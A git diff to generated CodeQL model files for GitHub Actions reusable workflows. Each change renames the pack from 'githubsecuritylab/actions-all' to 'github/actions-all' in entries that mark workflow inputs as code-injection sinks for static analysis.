diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index a437581ba83..10f06693d26 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 489e005cc0e..43d0fe1c2ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3a0e723e9f7..4fb13f0a18c 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 893be8a2725..96b73aa06de 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 75877fa48aa..554974bfe6f 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 489e6134eba..f1c6ec345d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 4feef931f71..2cfa8a46c83 100644 
--- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 189cd8bbafd..8c3c5a58502 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 418694a596d..aa75ce39295 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 10c4f8a3e3c..e9dd33c6f17 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 1837a505499..a0bd22ad352 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 094e4602e8e..fb98c6a7d9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index ec264f96bf1..0c108422a94 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 7463396b152..c820724bd71 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 4c52a10d4f1..51d32bde4ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index a6c5a8b8e3b..b747a4a27df 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 286e75fc9e2..c5c26bc7926 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 9ea5a9a34c7..62a1a853937 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 34e41e9c589..b6c0c1b5e64 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index cc38156973b..005db8e9ddc 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 748287e75f8..a1090c45ae0 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 703a138d28d..051aacfeee0 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 97f1bafd1f3..1fb380a3a72 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 064c946363f..a8b8234e1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 4a5c66bc744..108bbad1c07 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index a1e4b624b45..42ed67f3d20 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 888aed947da..a664d6063e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 3b5f69e9342..6270ab5842e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 8e28b46f2c7..0c4d975e012 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 7f63b48ed84..64fc3792659 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index e7e42031e04..f48be6693d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 0c34609ccef..f2ebae0b0ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 82de946e406..ec591db22ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 09c4c2a83c3..06fdea3f8a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index 0e4571fc728..b864551b3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 6a03acfb11d..fdb499a81dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index f41ee1211d3..c831a5d6d8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 8a64c0ce5f1..d9d4e9bd2fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 18e66bf7291..4091c74dee5 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1ed7561a533..1c6d8804d6d 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 738fde2cb86..f94c87537cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index c61a63f1144..efb8e467a0a 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index fef036f4f29..8a7b36e365c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index b13ba8bc40f..0d6fb59ed50 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 3fb2fefff6b..74bdb5ab280 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 4344e254be0..038fd953d6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 2a7c5feafea..0c185f4cbd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 9ccb41c3a8c..44e89b4e251 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index b71e6c001d0..6b4feeedf62 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
